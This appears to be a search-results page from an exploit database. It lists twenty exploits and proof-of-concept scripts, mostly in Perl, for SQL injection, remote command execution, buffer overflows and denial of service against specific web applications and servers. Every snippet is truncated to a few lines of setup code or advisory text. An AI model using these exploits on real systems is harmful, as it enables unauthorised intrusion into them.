1086 matches found
Exjune Guestbook 2.0 - Remote Database Disclosure Exploit
No description provided by source. !/usr/bin/perl By AlpHaNiX NullArea.Net alphaathacker.bz Made in Tunisia script : Exjune Guestbook v2 download : http://www.exjune.com/downloads/downloads/exJuneguestbook.asp Vulnerable : database path : /admin/exdb.mdb Real Life Example : OOO OOO OO OO OO OO O ...
Fishyshoop <= 0.930b Remote Add Administrator Account Exploit
No description provided by source. !/usr/bin/perl James Gray [email protected] Fishyshoop Security Vulnerability use WWW::Curl::Easy; sub usage print $0 Fishyshoop root URL Desired E-Mail Desired Password\n; exit; $FSURL=shift or usage; $UNAME=shift or usage; $PASS=shift or usage; my $fishyshoop...
AWStats (6.0-6.2) configdir Remote Command Execution Exploit (c code)
No description provided by source. / AwStats exploit by Thunder, [email protected] This exploit makes use of the remote command execution bug discovered in AwStats ver 6.2 and below. The bug resides in the awstats.pl perl script. The script does not sanitise correctly the user input for the...
Teamtek Universal FTP Server Multiple Commands Remote Denial of Service Vulnerabilities
No description provided by source. source: http://www.securityfocus.com/bid/21085/info Universal FTP Server is prone to multiple remote denial-of-service vulnerabilities because the application fails to handle exceptional conditions. An attacker can exploit these issues to crash the affected...
Annuaire 1Two 2.2 - Remote SQL Injection Exploit
No description provided by source. !/usr/bin/perl Affected.scr..: Annuaire 1Two 2.2 Poc.ID........: 09060902.txt Type..........: SQL Injection without quote Risk.level....: Medium Vendor.Status.: Unpatched Src.download..: http://www.1two.org/ Poc.link......: acid-root.new.fr/poc/09060902.txt...
Invision Power Board 2.0.0 - 2.0.2 - SQL Injection Exploit
No description provided by source. !/usr/bin/perl use IO::Socket;...
BL4 SMTP Server < 0.1.5 - Remote Buffer Overflow PoC
No description provided by source. !/usr/bin/perl use IO::Socket; use Socket; my$socket = ; if$ARGV 1 | $ARGV 2 usage if$ARGV 2 $prt = $ARGV1 else $prt = 25 ; $adr = $ARGV0; $prt = $ARGV1; $socket = IO::Socket::INET-newProto=tcp, PeerAddr=$adr, PeerPort=$prt, Reuse=1 or die Error: cant connect to...
MyBB Member.PHP SQL Injection Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/14684/info MyBB is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. Successful exploitation could result in a compromise of the...
Novell NetIQ Privileged User Manager 2.3.1 ldapagnt.dll ldapagnt_eval() Perl Code Evaluation RCE
No description provided by source. Novell NetIQ Privileged User Manager 2.3.1 ldapagnt.dll ldapagnteval Perl Code Evaluation RCE pre auth/SYSTEM Tested against: Microsoft Windows 2003 r2 sp2 download url: http://download.novell.com/index.jsp search Privileged User Manager file tested:...
Borland Interbase <= 7.x Remote Exploit
No description provided by source. !/usr/bin/perl Priv8security com remote exploit for Borland Interbase 7.1 SP 2 and lower Public Version!!! Bug found by Aviram Jenik www.securiteam.com unixfocus 5AP0P0UCUO.html wsxz@localhost buffer$ perl priv8ibserverb.pl -h localhost -t 0 -= Priv8security.com...
Envolution <= 1.1.0 (topic) Remote SQL Injection Exploit
No description provided by source. !/usr/bin/perl use LWP::UserAgent; use HTTP::Cookies; if@ARGV 3 usage; exit; $site = $ARGV0; Site Target $path = $ARGV1; Path direktori envolution1-0-1 $usid = $ARGV2; member id $www = new LWP::UserAgent; $sql =...
PHP-Nuke KutubiSitte Module - 'kid' Parameter SQL Injection Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/28126/info The KutubiSitte module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an...
YapBB <= 1.2 (cfgIncludeDirectory) Remote Command Execution Exploit
No description provided by source. !/usr/bin/perl YapBB =1.2 Beta Remote Command Execution Exploit Copyright c 2006 cijfer cijfer@netti!fi All rights reserved. never ctrl+c again. cijfer$ http://target.com/dir host changed to 'http://target.com/dir' cijfer$ to set your PHP shell location: cijfer$...
Cisco Aironet AP1x00 Malformed HTTP GET Denial of Service Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/8290/info Cisco Aironet AP1x00 series devices are prone to a denial of service vulnerability upon receipt of a malformed HTTP GET request. Such a request will cause the device to reload. !/usr/bin/perl Cisco Global...
SturGeoN Upload Arbitrary File Upload Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/18764/info SturGeoN Upload is prone to an arbitrary file-upload vulnerability. An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the webserver process. This may facilitat...
Daniel Beckham The Finger Server 0.82 BETA Pipe Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/974/info 'The Finger Server' is a perl script for providing .plan-like functionality through a website. Due to insufficient input checking it is possible for remote unauthenticated users to execute shell commands on the...
Crux Gallery <= 1.32 Insecure Cookie Handling Vulnerability
No description provided by source. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Crux Gallery = 1.32 / Insecure Cookie Handling Vulnerability -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Program: Crux Gallery Version: = 1,32 File affected: admin/ Download:...
My Gaming Ladder Combo System <= 7.0 - Remote Code Execution Exploit
No description provided by source. !/usr/bin/perl Method found & Exploit scripted by nukedx Contacts ICQ: 10072 MSN/Main: [email protected] web: www.nukedx.com Original advisory: http://www.nukedx.com/?viewdoc=28 Usage: ladder.pl host path cmd Dork: Ladder Scripts by http://www.mygamingladder.com...
WM Downloader 3.0.0.9 - PLS WMDownloader (PoC)
No description provided by source. !/usr/bin/perl JIKO =JAWAD Thanx To All Friends : Cyber-Zone , Stack , ZoRLu , Hussin X , Mag!c ompo ,Sad Hacker ,Strock ... All MoroCCaN HaCkerS No-Exploit.com EAX 00000000 ECX 41414141 EDX 000008C3 EBX 000FBBD4 ASCII F:\perso\test\tool\jiko.pls ESP 000F7298 EB...
AT-TFTP <= 1.9 (Long Filename) Remote Buffer Overflow Exploit
No description provided by source. !/usr/bin/perl -w acaroatjervus.it http://www.securityfocus.com/bid/21320 [email protected] is credited with the discovery of this vulnerability use IO::Socket; if!$ARGV1 print Uso: atftp-19.pl victim port\n\n; exit; $victim = IO::Socket::INET-newProto='udp',...